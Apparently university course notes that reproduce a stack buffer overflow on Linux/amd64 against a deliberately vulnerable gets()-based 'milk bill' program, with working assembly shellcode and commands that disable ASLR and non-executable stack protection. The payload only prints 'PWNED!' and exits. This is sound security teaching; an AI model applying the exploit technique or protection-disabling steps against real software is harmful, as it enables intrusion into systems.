Buffer overruns on Linux (Digital Systems)

Copyright © 2024 J. M. Spivey

Let's try to reproduce on Linux/amd64 the attack that was made on the micro:bit. Here's a Linux version of the milk bill program:

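#include <stdio.h>
#include <stdlib.h>

char *gets(char *buf);

int getnum(void) {
    char buf[64];
    gets(buf);            /* no bounds check: the overrun happens here */
    return atoi(buf);
}

int main(void) {
    int milk[10];

    for (int i = 0; i < 10; i++) {
        int x = getnum();
        printf("Input %d = %d\n", i, x);
        milk[i] = x;
    }

    /* ... adding up the bill is omitted ... */
    return 0;
}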

(I've omitted the boring bit that adds up the bill at the end.) You will note that getnum's buffer has been expanded to 64 bytes in order to accommodate the rather less compact code we will write for the AMD64.

Just getting this program compiled is a bit difficult, because on recent Linux systems, omitting the explicit declaration of gets results in the message,

milk86.c:6:5: warning: implicit declaration of function ‘gets’

(because the function is no longer declared in stdio.h), and even with the declaration we still get a warning from the linker.

milk86.c:(.text+0x15): warning: the `gets' function is dangerous and should not be used.

That's about right!

Next, we find that the address of the array buf varies from one invocation of the program to the next, because of a Linux feature called ASLR (address space layout randomisation), designed precisely to defeat attacks like ours that depend on knowing the addresses of parts of a running program.

We can temporarily disable ASLR by starting a new shell with the command,

$ setarch `uname -m` -R /bin/bash

Here, the -R flag disables ASLR for processes started from the new shell. When you've finished experimenting, you can exit that shell and return to safety.

With ASLR disabled, you can discover the (now fixed) address of buf, either by using a debugger, or by inserting into getnum the line

printf("%llx\n", (unsigned long long) buf);

that prints out the address of buf as a 64-bit number in hexadecimal.

The next task is to write an attack string. This time we must make sure that the whole attack string is swallowed by the Linux implementation of gets, which is advertised as reading up to the end of a line of input or to the end of the file, whichever comes first. It turns out that gets will quite happily read past zero bytes in the input and store them, even though by the usual C conventions a zero byte marks the end of a string. A newline, on the other hand, stops gets in its tracks, so the attack string must not contain the byte 0xa anywhere. If we want to print a newline, we must manufacture it some other way, and we will take suitable care over that.

On the micro:bit, we output our ransom note by calling printf, a subroutine that existed at a known location in memory. Here, instead of trying to locate library routines, it's easier to invoke Linux system calls directly, something we can do by setting the registers to appropriate values and executing a syscall instruction. The assembly code below is equivalent to the C statements

write(1, "PWNED!\n", 7); exit(0);

with both write and exit being Linux system calls. Without further ado, here is my code for the attack string. The instructions are, naturally enough, written in assembly language for the AMD64, rather than the ARM/Thumb.

    .equ frame, 0x7fffffffe690 # Address of stack frame

    .global _start
_start:
    movl $1, %eax              # System call 1: write(fd, buf, n)
    movl $1, %edi              # ... on standard output
    leaq message(%rip), %rsi   # ... with our message
    incb 6(%rsi)               # Fix the newline
    movl $7, %edx              # ... 7 characters
    syscall                    # Perform the system call

    movl $60, %eax             # System call 60: exit(status)
    movl $0, %edi              # ... with status 0
    syscall                    # Perform the call

    .p2align 2, 0
message:
    .asciz "PWNED!\011"        # Tab (0x9) will be replaced by newline

    .p2align 6, 0              # Pad with zeros to 64 bytes, filling buf
    .quad 0                    # Overwrites the saved frame pointer
    .quad frame                # Overwrites the return address

Note the sneaky computation of the newline character 0xa by incrementing the character 0x9: this avoids having 0xa appear as a byte in the instruction stream. Including the label _start makes it possible to run the assembler output through the linker and execute it directly for debugging.

To make the attack string, we need to produce a raw binary image, using the commands

$ as attack.s -o attack.o
$ objcopy -O binary attack.o attack

Now invoking the milk program with attack as its input still doesn't get us "PWNED!":

$ ./milk <attack
Segmentation fault

We have certainly managed to crash the program, but we have not bent it to our will.

There remains one further defence in place: by default, the segment of storage that contains the run-time stack is marked as non-executable, so that attempting to jump into it results in the program's stopping with a segmentation fault. Normally, that's a good thing because it thwarts attacks like ours. But it is possible to mark a program as requiring an executable stack segment, and this is used in certain programming techniques that involve generating small fragments of code dynamically. We can make the milk program vulnerable using a program called execstack (on Debian, you might need to install it first, and it's tucked away in /usr/sbin out of the way of noobs).

$ /usr/sbin/execstack -s milk

Now the attack hits home!

$ ./milk <attack